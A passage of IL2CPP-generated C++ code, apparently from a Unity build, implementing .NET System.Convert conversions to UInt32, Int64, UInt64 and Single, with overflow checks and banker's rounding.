IL_0015: { uint64_t L_3 = ___value0; return (((int32_t)((uint32_t)L_3))); } } // System.UInt32 System.Convert::ToUInt32(System.Single) extern "C" IL2CPP_METHOD_ATTR uint32_t Convert_ToUInt32_mE576F9C14D9BA51A0E3471521033BF798781CCE7 (float ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt32_mE576F9C14D9BA51A0E3471521033BF798781CCE7_MetadataUsageId); s_Il2CppMethodInitialized = true; } { float L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); uint32_t L_1 = Convert_ToUInt32_mB7F4B7176295B3AA240199C4C2E7E59C3B74E6AF((((double)((double)L_0))), /*hidden argument*/NULL); return L_1; } } // System.UInt32 System.Convert::ToUInt32(System.Double) extern "C" IL2CPP_METHOD_ATTR uint32_t Convert_ToUInt32_mB7F4B7176295B3AA240199C4C2E7E59C3B74E6AF (double ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt32_mB7F4B7176295B3AA240199C4C2E7E59C3B74E6AF_MetadataUsageId); s_Il2CppMethodInitialized = true; } uint32_t V_0 = 0; double V_1 = 0.0; { double L_0 = ___value0; if ((!(((double)L_0) >= ((double)(-0.5))))) { goto IL_0044; } } { double L_1 = ___value0; if ((!(((double)L_1) < ((double)(4294967295.5))))) { goto IL_0044; } } { double L_2 = ___value0; V_0 = (((int32_t)((uint32_t)L_2))); double L_3 = ___value0; uint32_t L_4 = V_0; V_1 = ((double)il2cpp_codegen_subtract((double)L_3, (double)(((double)((double)(((double)((uint32_t)L_4)))))))); double L_5 = V_1; if ((((double)L_5) > ((double)(0.5)))) { goto IL_003e; } } { double L_6 = V_1; if ((!(((double)L_6) == ((double)(0.5))))) { goto IL_0042; } } { uint32_t L_7 = V_0; if (!((int32_t)((int32_t)L_7&(int32_t)1))) { goto IL_0042; } } IL_003e: { uint32_t L_8 = V_0; V_0 = ((int32_t)il2cpp_codegen_add((int32_t)L_8, (int32_t)1)); } IL_0042: { uint32_t L_9 = V_0; return L_9; } IL_0044: { String_t* L_10 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral2E2FC55ECA0F95E74B3E4F4CEB108D4486D3F1A6, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_11 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_11, L_10, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_11, NULL, Convert_ToUInt32_mB7F4B7176295B3AA240199C4C2E7E59C3B74E6AF_RuntimeMethod_var); } } // System.UInt32 System.Convert::ToUInt32(System.Decimal) extern "C" IL2CPP_METHOD_ATTR uint32_t Convert_ToUInt32_m2726353738A26D6688A1F8F074056C17A09B3A84 (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt32_m2726353738A26D6688A1F8F074056C17A09B3A84_MetadataUsageId); s_Il2CppMethodInitialized = true; } { Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_1 = Decimal_Round_mD73CF41AB10D501F9DAD3F351007B361017F2801(L_0, 0, /*hidden argument*/NULL); uint32_t L_2 = Decimal_ToUInt32_mC664BD6ACBC5640F9CC3CCC40C7D1F39677D9E3A(L_1, /*hidden argument*/NULL); return L_2; } } // System.UInt32 System.Convert::ToUInt32(System.String,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint32_t Convert_ToUInt32_mC50B44F279840348382A3715A480F4502464F20B (String_t* ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { { String_t* L_0 = ___value0; if (L_0) { goto IL_0005; } } { return 0; } IL_0005: { String_t* L_1 = ___value0; RuntimeObject* L_2 = ___provider1; uint32_t L_3 = UInt32_Parse_mEEC266AE3E2BA9F49F4CD5E69EBDA3A1B008E125(L_1, 7, L_2, /*hidden argument*/NULL); return L_3; } } // System.Int64 System.Convert::ToInt64(System.Object,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int64_t Convert_ToInt64_m8964FDE5D82FEC54106DBF35E1F67D70F6E73E29 (RuntimeObject * ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt64_m8964FDE5D82FEC54106DBF35E1F67D70F6E73E29_MetadataUsageId); s_Il2CppMethodInitialized = true; } { RuntimeObject * L_0 = ___value0; if (!L_0) { goto IL_0010; } } { RuntimeObject * L_1 = ___value0; RuntimeObject* L_2 = ___provider1; int64_t L_3 = InterfaceFuncInvoker1< int64_t, RuntimeObject* >::Invoke(9 /* System.Int64 System.IConvertible::ToInt64(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, ((RuntimeObject*)Castclass((RuntimeObject*)L_1, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var)), L_2); return L_3; } IL_0010: { return (((int64_t)((int64_t)0))); } } // System.Int64 System.Convert::ToInt64(System.Boolean) extern "C" IL2CPP_METHOD_ATTR int64_t Convert_ToInt64_mBF88328347C2C2FC83315E9B950ADD1CF473559E (bool ___value0, const RuntimeMethod* method) { int32_t G_B3_0 = 0; { bool L_0 = ___value0; if (L_0) { goto IL_0006; } } { G_B3_0 = 0; goto IL_0007; } IL_0006: { G_B3_0 = 1; } IL_0007: { return (((int64_t)((int64_t)G_B3_0))); } } // System.Int64 System.Convert::ToInt64(System.Char) extern "C" IL2CPP_METHOD_ATTR int64_t Convert_ToInt64_mAF15CED595F02814C73326AF76050B600CAED358 (Il2CppChar ___value0, const RuntimeMethod* method) { { Il2CppChar L_0 = ___value0; return (((int64_t)((uint64_t)L_0))); } } // System.Int64 System.Convert::ToInt64(System.SByte) extern "C" IL2CPP_METHOD_ATTR int64_t Convert_ToInt64_mE4A030ED672D453F0704069D7024934D040D326A (int8_t ___value0, const RuntimeMethod* method) { { int8_t L_0 = ___value0; return (((int64_t)((int64_t)L_0))); } } // System.Int64 System.Convert::ToInt64(System.Byte) extern "C" IL2CPP_METHOD_ATTR int64_t Convert_ToInt64_m503ADEC363722EBF6A65F9C9F5619150BF00DDCC (uint8_t ___value0, const RuntimeMethod* method) { { uint8_t L_0 = ___value0; return (((int64_t)((uint64_t)L_0))); } } // System.Int64 System.Convert::ToInt64(System.Int16) extern "C" IL2CPP_METHOD_ATTR int64_t Convert_ToInt64_m2261BB84FA0B10E657E622163945B4ED9D3C2D11 (int16_t ___value0, const RuntimeMethod* method) { { int16_t L_0 = ___value0; return (((int64_t)((int64_t)L_0))); } } // System.Int64 System.Convert::ToInt64(System.UInt16) extern "C" IL2CPP_METHOD_ATTR int64_t Convert_ToInt64_mE191CDE636529E410288B04286028D56CBC8EE53 (uint16_t ___value0, const RuntimeMethod* method) { { uint16_t L_0 = ___value0; return (((int64_t)((uint64_t)L_0))); } } // System.Int64 System.Convert::ToInt64(System.Int32) extern "C" IL2CPP_METHOD_ATTR int64_t Convert_ToInt64_m61697621C2BC4FDADFE1742507EBA7B3C1D76475 (int32_t ___value0, const RuntimeMethod* method) { { int32_t L_0 = ___value0; return (((int64_t)((int64_t)L_0))); } } // System.Int64 System.Convert::ToInt64(System.UInt32) extern "C" IL2CPP_METHOD_ATTR int64_t Convert_ToInt64_m32144C3A1499C6810428CC3F22BCB095EFFEE99F (uint32_t ___value0, const RuntimeMethod* method) { { uint32_t L_0 = ___value0; return (((int64_t)((uint64_t)L_0))); } } // System.Int64 System.Convert::ToInt64(System.UInt64) extern "C" IL2CPP_METHOD_ATTR int64_t Convert_ToInt64_m396C2B4FA8F12D0C76E0AA3A31872D93BF5EA11D (uint64_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt64_m396C2B4FA8F12D0C76E0AA3A31872D93BF5EA11D_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint64_t L_0 = ___value0; if ((!(((uint64_t)L_0) > ((uint64_t)((int64_t)std::numeric_limits<int64_t>::max()))))) { goto IL_001c; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral952604412082661142BB4448D6792E048E0317FC, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToInt64_m396C2B4FA8F12D0C76E0AA3A31872D93BF5EA11D_RuntimeMethod_var); } IL_001c: { uint64_t L_3 = ___value0; return L_3; } } // System.Int64 System.Convert::ToInt64(System.Single) extern "C" IL2CPP_METHOD_ATTR int64_t Convert_ToInt64_m6963E5AB9C468141588B8BE08A9F2454A066D3CA (float ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt64_m6963E5AB9C468141588B8BE08A9F2454A066D3CA_MetadataUsageId); s_Il2CppMethodInitialized = true; } { float L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); int64_t L_1 = Convert_ToInt64_m64CA1F639893BC431286C0AE8266AA46E38FB57D((((double)((double)L_0))), /*hidden argument*/NULL); return L_1; } } // System.Int64 System.Convert::ToInt64(System.Double) extern "C" IL2CPP_METHOD_ATTR int64_t Convert_ToInt64_m64CA1F639893BC431286C0AE8266AA46E38FB57D (double ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt64_m64CA1F639893BC431286C0AE8266AA46E38FB57D_MetadataUsageId); s_Il2CppMethodInitialized = true; } { double L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Math_tFB388E53C7FDC6FCCF9A19ABF5A4E521FBD52E19_il2cpp_TypeInfo_var); double L_1 = bankers_round(L_0); if (L_1 > (double)(std::numeric_limits<int64_t>::max())) IL2CPP_RAISE_MANAGED_EXCEPTION(il2cpp_codegen_get_overflow_exception(), NULL, NULL); return (((int64_t)((int64_t)L_1))); } } // System.Int64 System.Convert::ToInt64(System.Decimal) extern "C" IL2CPP_METHOD_ATTR int64_t Convert_ToInt64_m66912A2344452B0C97DD3EE60A8560A49248CF78 (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt64_m66912A2344452B0C97DD3EE60A8560A49248CF78_MetadataUsageId); s_Il2CppMethodInitialized = true; } { Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_1 = Decimal_Round_mD73CF41AB10D501F9DAD3F351007B361017F2801(L_0, 0, /*hidden argument*/NULL); int64_t L_2 = Decimal_ToInt64_mB2D5CC63EDC9C99171ADA933FD133905D7FCCA72(L_1, /*hidden argument*/NULL); return L_2; } } // System.Int64 System.Convert::ToInt64(System.String) extern "C" IL2CPP_METHOD_ATTR int64_t Convert_ToInt64_m740F0CA2696F5D04F06456FCBFE08E942B12B4A6 (String_t* ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt64_m740F0CA2696F5D04F06456FCBFE08E942B12B4A6_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = ___value0; if (L_0) { goto IL_0006; } } { return (((int64_t)((int64_t)0))); } IL_0006: { String_t* L_1 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_il2cpp_TypeInfo_var); CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * L_2 = CultureInfo_get_CurrentCulture_mD86F3D8E5D332FB304F80D9B9CA4DE849C2A6831(/*hidden argument*/NULL); int64_t L_3 = Int64_Parse_m58A1CEB948FDC6C2ECCA27CA9D19CB904BF98FD4(L_1, L_2, /*hidden argument*/NULL); return L_3; } } // System.Int64 System.Convert::ToInt64(System.String,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int64_t Convert_ToInt64_m4D2C0087ADC13CEFB913E2E071E486EF9077A452 (String_t* ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { { String_t* L_0 = ___value0; if (L_0) { goto IL_0006; } } { return (((int64_t)((int64_t)0))); } IL_0006: { String_t* L_1 = ___value0; RuntimeObject* L_2 = ___provider1; int64_t L_3 = Int64_Parse_m5113C0CCFB668DBC49D71D9F07CC8A96B8C7773D(L_1, 7, L_2, /*hidden argument*/NULL); return L_3; } } // System.UInt64 System.Convert::ToUInt64(System.Object,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint64_t Convert_ToUInt64_mA8C3C5498FC28CBA0EB0C37409EB9E04CCF6B8D2 (RuntimeObject * ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt64_mA8C3C5498FC28CBA0EB0C37409EB9E04CCF6B8D2_MetadataUsageId); s_Il2CppMethodInitialized = true; } { RuntimeObject * L_0 = ___value0; if (!L_0) { goto IL_0010; } } { RuntimeObject * L_1 = ___value0; RuntimeObject* L_2 = ___provider1; uint64_t L_3 = InterfaceFuncInvoker1< uint64_t, RuntimeObject* >::Invoke(10 /* System.UInt64 System.IConvertible::ToUInt64(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, ((RuntimeObject*)Castclass((RuntimeObject*)L_1, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var)), L_2); return L_3; } IL_0010: { return (((int64_t)((int64_t)0))); } } // System.UInt64 System.Convert::ToUInt64(System.Boolean) extern "C" IL2CPP_METHOD_ATTR uint64_t Convert_ToUInt64_m46350FEF6029990034BDFAB1FBC4F25EAF47B53B (bool ___value0, const RuntimeMethod* method) { { bool L_0 = ___value0; if (L_0) { goto IL_0006; } } { return (((int64_t)((int64_t)0))); } IL_0006: { return (((int64_t)((int64_t)1))); } } // System.UInt64 System.Convert::ToUInt64(System.Char) extern "C" IL2CPP_METHOD_ATTR uint64_t Convert_ToUInt64_mFCB74BC6F5D944A1894E875C4B8D3D53DE7EFA75 (Il2CppChar ___value0, const RuntimeMethod* method) { { Il2CppChar L_0 = ___value0; return (((int64_t)((uint64_t)L_0))); } } // System.UInt64 System.Convert::ToUInt64(System.SByte) extern "C" IL2CPP_METHOD_ATTR uint64_t Convert_ToUInt64_m24AAA55A63E618B389C773AC090EB4F664BFC729 (int8_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt64_m24AAA55A63E618B389C773AC090EB4F664BFC729_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int8_t L_0 = ___value0; if ((((int32_t)L_0) >= ((int32_t)0))) { goto IL_0014; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral4FA1555162B320F87E718E7D03508690DA6245A7, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToUInt64_m24AAA55A63E618B389C773AC090EB4F664BFC729_RuntimeMethod_var); } IL_0014: { int8_t L_3 = ___value0; return (((int64_t)((int64_t)L_3))); } } // System.UInt64 System.Convert::ToUInt64(System.Byte) extern "C" IL2CPP_METHOD_ATTR uint64_t Convert_ToUInt64_mAD731FB7078B5949B0592212E8563C59F1CC7172 (uint8_t ___value0, const RuntimeMethod* method) { { uint8_t L_0 = ___value0; return (((int64_t)((uint64_t)L_0))); } } // System.UInt64 System.Convert::ToUInt64(System.Int16) extern "C" IL2CPP_METHOD_ATTR uint64_t Convert_ToUInt64_m97F318132CF70D2795CFB709BAB8789803BCC08A (int16_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt64_m97F318132CF70D2795CFB709BAB8789803BCC08A_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int16_t L_0 = ___value0; if ((((int32_t)L_0) >= ((int32_t)0))) { goto IL_0014; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral4FA1555162B320F87E718E7D03508690DA6245A7, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToUInt64_m97F318132CF70D2795CFB709BAB8789803BCC08A_RuntimeMethod_var); } IL_0014: { int16_t L_3 = ___value0; return (((int64_t)((int64_t)L_3))); } } // System.UInt64 System.Convert::ToUInt64(System.UInt16) extern "C" IL2CPP_METHOD_ATTR uint64_t Convert_ToUInt64_m13A97BCFDAB847AC0D6379DA3FBE031509801944 (uint16_t ___value0, const RuntimeMethod* method) { { uint16_t L_0 = ___value0; return (((int64_t)((uint64_t)L_0))); } } // System.UInt64 System.Convert::ToUInt64(System.Int32) extern "C" IL2CPP_METHOD_ATTR uint64_t Convert_ToUInt64_m3D60F8111B12E0D8BB538E433065340CF45EB772 (int32_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt64_m3D60F8111B12E0D8BB538E433065340CF45EB772_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = ___value0; if ((((int32_t)L_0) >= ((int32_t)0))) { goto IL_0014; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral4FA1555162B320F87E718E7D03508690DA6245A7, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToUInt64_m3D60F8111B12E0D8BB538E433065340CF45EB772_RuntimeMethod_var); } IL_0014: { int32_t L_3 = ___value0; return (((int64_t)((int64_t)L_3))); } } // System.UInt64 System.Convert::ToUInt64(System.UInt32) extern "C" IL2CPP_METHOD_ATTR uint64_t Convert_ToUInt64_mC8F7AEA2A46B8BEB45B65312F49EEE2540B596EC (uint32_t ___value0, const RuntimeMethod* method) { { uint32_t L_0 = ___value0; return (((int64_t)((uint64_t)L_0))); } } // System.UInt64 System.Convert::ToUInt64(System.Int64) extern "C" IL2CPP_METHOD_ATTR uint64_t Convert_ToUInt64_mE0A19C049B47AC33472017793E0B8FCF5A9CE098 (int64_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt64_mE0A19C049B47AC33472017793E0B8FCF5A9CE098_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int64_t L_0 = ___value0; if ((((int64_t)L_0) >= ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_0015; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral4FA1555162B320F87E718E7D03508690DA6245A7, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToUInt64_mE0A19C049B47AC33472017793E0B8FCF5A9CE098_RuntimeMethod_var); } IL_0015: { int64_t L_3 = ___value0; return L_3; } } // System.UInt64 System.Convert::ToUInt64(System.Single) extern "C" IL2CPP_METHOD_ATTR uint64_t Convert_ToUInt64_mC9816AF80E8B2471627DB2BE1E4A02160D8BAFF3 (float ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt64_mC9816AF80E8B2471627DB2BE1E4A02160D8BAFF3_MetadataUsageId); s_Il2CppMethodInitialized = true; } { float L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); uint64_t L_1 = Convert_ToUInt64_mA246C8DD45C3EA0EFB21E3ED8B6EE6FAAE119232((((double)((double)L_0))), /*hidden argument*/NULL); return L_1; } } // System.UInt64 System.Convert::ToUInt64(System.Double) extern "C" IL2CPP_METHOD_ATTR uint64_t Convert_ToUInt64_mA246C8DD45C3EA0EFB21E3ED8B6EE6FAAE119232 (double ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt64_mA246C8DD45C3EA0EFB21E3ED8B6EE6FAAE119232_MetadataUsageId); s_Il2CppMethodInitialized = true; } { double L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Math_tFB388E53C7FDC6FCCF9A19ABF5A4E521FBD52E19_il2cpp_TypeInfo_var); double L_1 = bankers_round(L_0); if (L_1 > (double)(std::numeric_limits<uint64_t>::max())) IL2CPP_RAISE_MANAGED_EXCEPTION(il2cpp_codegen_get_overflow_exception(), NULL, NULL); return (((uint64_t)((uint64_t)L_1))); } } // System.UInt64 System.Convert::ToUInt64(System.Decimal) extern "C" IL2CPP_METHOD_ATTR uint64_t Convert_ToUInt64_m4A02F154C2265302484CD2741DF92C14531134F0 (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt64_m4A02F154C2265302484CD2741DF92C14531134F0_MetadataUsageId); s_Il2CppMethodInitialized = true; } { Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_1 = Decimal_Round_mD73CF41AB10D501F9DAD3F351007B361017F2801(L_0, 0, /*hidden argument*/NULL); uint64_t L_2 = Decimal_ToUInt64_mABC57AEE77C35B13F9FEE100D6DFF015A2CADBB5(L_1, /*hidden argument*/NULL); return L_2; } } // System.UInt64 System.Convert::ToUInt64(System.String,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint64_t Convert_ToUInt64_m638AC1F743BB4D9617FF085EF7EB8E23BCA7B3C6 (String_t* ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { { String_t* L_0 = ___value0; if (L_0) { goto IL_0006; } } { return (((int64_t)((int64_t)0))); } IL_0006: { String_t* L_1 = ___value0; RuntimeObject* L_2 = ___provider1; uint64_t L_3 = UInt64_Parse_mBCA93243BACC50D7302706C914152213B8AB85A5(L_1, 7, L_2, /*hidden argument*/NULL); return L_3; } } // System.Single System.Convert::ToSingle(System.Object,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR float Convert_ToSingle_mDC4B8C88AF6F230E79A887EFD4D745CB08341828 (RuntimeObject * ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToSingle_mDC4B8C88AF6F230E79A887EFD4D745CB08341828_MetadataUsageId); s_Il2CppMethodInitialized = true; } { RuntimeObject * L_0 = ___value0; if (!L_0) { goto IL_0010; } } { RuntimeObject * L_1 = ___value0; RuntimeObject* L_2 = ___provider1; float L_3 = InterfaceFuncInvoker1< float, RuntimeObject* >::Invoke(11 /* System.Single System.IConvertible::ToSingle(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, ((RuntimeObject*)Castclass((RuntimeObject*)L_1, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var)), L_2); return L_3; } IL_0010: { return (0.0f); } } // System.Single System.Convert::ToSingle(System.SByte) extern "C" IL2CPP_METHOD_ATTR float Convert_ToSingle_m6594D24976A20E820938E5DE88A63082EAFED0F4 (int8_t ___value0, const RuntimeMethod* method) { { int8_t L_0 = ___value0; return (((float)((float)L_0))); } } // System.Single System.Convert::ToSingle(System.Byte) extern "C" IL2CPP_METHOD_ATTR float Convert_ToSingle_m0DC063AF835020D49B1FB600753AFCDA0205609A (uint8_t ___value0, const RuntimeMethod* method) { { uint8_t L_0 = ___value0; return (((float)((float)L_0))); } } // System.Single System.Convert::ToSingle(System.Int16) extern "C" IL2CPP_METHOD_ATTR float Convert_ToSingle_m419FC798EE52D4A39F7719FA060CC198EF94F2B0 (int16_t ___value0, const RuntimeMethod* method) { { int16_t L_0 = ___value0; return (((float)((float)L_0))); } } // System.Single System.Convert::ToSingle(System.UInt16) extern "C" IL2CPP_METHOD_ATTR float Convert_ToSingle_mFBCC3DBA2C1A176506B5B23193DD0F5F27085EAA (uint16_t ___value0, const RuntimeMethod* method) { { uint16_t L_0 = ___value0; return (((float)((float)L_0))); } } // System.Single System.Convert::ToSingle(System.Int32) extern "C" IL2CPP_METHOD_ATTR float Convert_ToSingle_m4D6202BB2F75526A5E01DA49A35D26007C76A21C (int32_t ___value0, const RuntimeMethod* method) { { int32_t L_0 = ___value0; return (((float)((float)L_0))); } } // System.Single System.Convert::ToSingle(System.UInt32) extern "C" IL2CPP_METHOD_ATTR float Convert_ToSingle_m6F50A25E0020F35AEC587BE3A91E1A6D78351249 (uint32_t ___value0, const RuntimeMethod* method) { { uint32_t L_0 = ___value0; return (((float)((float)(((double)((uint32_t)L_0)))))); } } // System.Single System.Convert::ToSingle(System.Int64) extern "C" IL2CPP_METHOD_ATTR float Convert_ToSingle_m3A854A75BE60D077E283A444B4EEF3ED6E984F9A (int64_t ___value0, const RuntimeMethod* method) { { int64_t L_0 = ___value0; return (((float)((float)L_0))); } } // System.Single System.Convert::ToSingle(System.UInt64) extern "C" IL2CPP_METHOD_ATTR float Convert_ToSingle_mEB588F7F980A4BF31BDBACC733574C97A32E357A (uint64_t ___value0, const RuntimeMethod* method) { { uint64_t L_0 = ___value0; return (((float)((float)(((double)((uint64_t)L_0)))))); } } // System.Single System.Convert::ToSingle(System.Double) extern "C" IL2CPP_METHOD_ATTR float 